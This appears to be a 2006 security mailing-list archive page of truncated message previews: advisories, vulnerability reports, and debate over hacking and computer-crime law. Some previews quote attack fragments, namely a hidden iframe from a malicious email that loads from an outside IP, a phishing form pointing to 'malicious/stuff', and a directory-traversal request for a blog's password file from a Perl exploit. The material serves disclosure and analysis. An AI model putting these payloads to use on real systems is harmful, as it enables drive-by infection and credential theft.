Dear [EMAIL PROTECTED],
This is a case of 'real' stack structure overflow, not stack buffer
overflow (stack overrun) as you maybe think. The process' stack is
exhausted because of recursive call. Exploitation of this situation to
execute code may be hard, if possible.
--
~/ZARAZA
Dear [EMAIL PROTECTED],
This piece of HTML has nothing to do with java. It has javascript.
Javascript generates equivalent of IFRAME SRC=http://63.134.215.88/a/;
height=0 width=0. It will not work for patched Outlook Express
because e-mail works in restricted hosts zone.
--Friday,
On Fri, 17 Feb 2006 [EMAIL PROTECTED] wrote:
I just receieved this exploit, I have looked around and all I could find
lately are the following Java issues: Gentoo Linux Security Advisory
GLSA 200601-10 - Sun and Blackdown Java: Applet privilege escalation
I don't have the Java knowledge to
ps, this decodes to the following HTML snippet (i have deliberately
obfuscated the tags):
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]
here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
With register_globals turned off none of these attacks are possible.
So is there going to be a update to fix the insecure code or is your
fix going to remain as so:
(register globals must be off to run dotproject)
/str0ke
On 2/15/06, Adam Donnison [EMAIL PROTECTED] wrote:
I responded to this
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:041
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:042
http://www.mandriva.com/security/
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:043
http://www.mandriva.com/security/
Ken Hollis (aka Gandalf) wrote:
Has anybody seen this before? I know that the mouseover issues ...
[FORM action=http://malicious/stuff]
[a href=https://trusted/site;]
[INPUT ...][/a]
Does not seem to be a mouseover issue, but seems identical to
Internet Explorer/Outlook Express
- Coppermine Photo Gallery = 1.4.3 arbitrary local/remote inclusion: -
- 18/02/2006 5.09.55 ---
software:
site: http://coppermine-gallery.net/index.php
Software: e107 CMS 0.7.2
Software Details: Chatbox Plugin v1.0
Class:Remote
Type: XSS
== Desription ===
XSS vulnerability exists in e107 0.7.2 CMS.
user input is not correctly sanitized in Chatbox Plugin v1.0.
== Exploit =
Web Site : http://www.tasarimrehberi.com [Turkish Desing]
Description : index.php remote attack
Vulnerable ; http://www.site.com/index.php?sayfaadi=; and index.php?sayfa=
Patriotic Hackers!
Botan,B3g0k,Azad,Nistiman,Fesih :}
Freedom For Ocalan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
[EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
OpenPKG Security AdvisoryThe OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
[EMAIL PROTECTED]
#!/usr/bin/perl
#
# RCBlog 1.0.3 / 1.0.2
# Exploit by Hessam-x (www.hessamx.net)
# Name: RCBlog (www.fluffington.com
# version : 1.0.3 / 1.0.2
# manual exploiting:
# index.php?%20post=../config/password
#
use LWP::Simple;
print ---\n;
print =
##
# GulfTech Security ResearchFebruary 18, 2006
##
# Vendor : John Lim
# URL : http://adodb.sourceforge.net/
# Version : ADOdb = 4.71
# Risk : Cross Site Scripting
{}
{ [waraxe-2006-SA#045]
}
{}
{
My first vulnerability report :)
Description:
WPC.easy is a database generated website with a dynamic on-line
administration suite which allows for product updates, editing, deleting, image
upload and price changes. WPC.easy is powered by a Secure Database.
vendor:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200602-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-
Fedora Legacy Update Advisory
Synopsis: Updated openssh packages fix security issues
Advisory ID: FLSA:168935
Issue date:2006-02-18
Product: Red Hat Linux, Fedora Core
Keywords:
-
Fedora Legacy Update Advisory
Synopsis: Updated squid package fixes security issues
Advisory ID: FLSA:152809
Issue date:2006-02-18
Product: Red Hat Linux, Fedora Core
Keywords:
In the following (quick dirty) write-up (which is too big for sending
into bugtraq) I start by discussing some recent threats network
operators should be aware of, such as recursive DNS attacks.
Also, a bit on the state of the Internet, cooperation across different
fields and how these latest
Hi all,
Secure Science's External Threat Assessment Team is issuing this malware
analysis report in an effort to shed light on emerging threats.
http://www.securescience.net/advisories/SSC_MSAT_FEB_02_2006-public.pdf
-Lance James
Secure Science Corp
www.securescience.net
Wow...this is definitely a big can of worms to open...
I both agree and disagree with your stance. Hopefully I'm caffeinated
enough to express my reasoning clearly.
While I don't feel like elaborating too much, my drive to become an
InfoSec professional was driven mostly by the hacker
Phishing through WinRAR 3.51
Credit to: Preben Nyløkken
Tested on version: 3.51
Vendors site: www.rarlabs.com
Vendor status: Tried contacting without luck.
Description:
Due to the build-up of WinRAR, some vital parts of the programs functions and
url's are
Here here, Paul.
Worried your test network isn't real enough? Make it better! Throw in IDS,
patch management, whatever.
As Paul suggested, get your buddies involved. I've seen workshops where people
are designated attacker and defender, objectives are obvious.
If kids / pro's aren't smart
Advanced societies are updating computer crime laws faster than the
rest of the world. This means that new generations of these more
advanced societies will have no clue about how remote computer attacks
are carried out. Future generations of security experts will be among
the most
Marcus,
You use the analogy of trespassing to describe unauthorized access to a
computer system or it's resources. I agree with you but I think a point
was missed...
The laws being passed today against *cyber crime* far exceed the basic
property laws. If someone gains access to a system he
I would have to say that I agree with you in what you have said. I am a
young security professional with a cissp, but growing up I did not have the
$ to be able to purchase vmware and all the software to setup a test
environment. I also bet that most of you between ages 12 - 16 had the
minimum
Marcus J. Ranum [EMAIL PROTECTED] wrote:
If you're trying to understand the security properties of a
system by breaking into it, you not producing valuable
reports, anyhow. All you are doing is telling them where
to put the next band-aid.
I know of too many (more than none is too many)
nuqneH,
I'd even say, if you hire someone whose security knowledge is based solely
on breaking into systems, this guy will not able to produce valuable reports
for customers because his viewpoint is likely to be flawed; his knowledge on
protecting system usually falls into patch-this-hole
Paul,
On 2006-02-15 Paul Schmehl wrote:
--On Saturday, February 11, 2006 16:35:20 + [EMAIL PROTECTED] wrote:
New generations of teenagers will be scared of doing online
exploration. I'm not talking about damaging other companies' computer
systems. I'm talking about accessing them
That's not crashing my fully updated Internet Explorer.Just the Crash text is
flashing in that example but my internet explorer keep working properly.Am I
missing something?
Gadi Evron wrote:
The first worm (mass mailer) to (ab)use the WMF 0day is now spreading in
Australia.
Respectfully speaking:
There are a few corrections to this that need to be expressed.
The language you're using describing it as a mass-mailing worm is coming
off confusing to some. The
34 matches
Mail list logo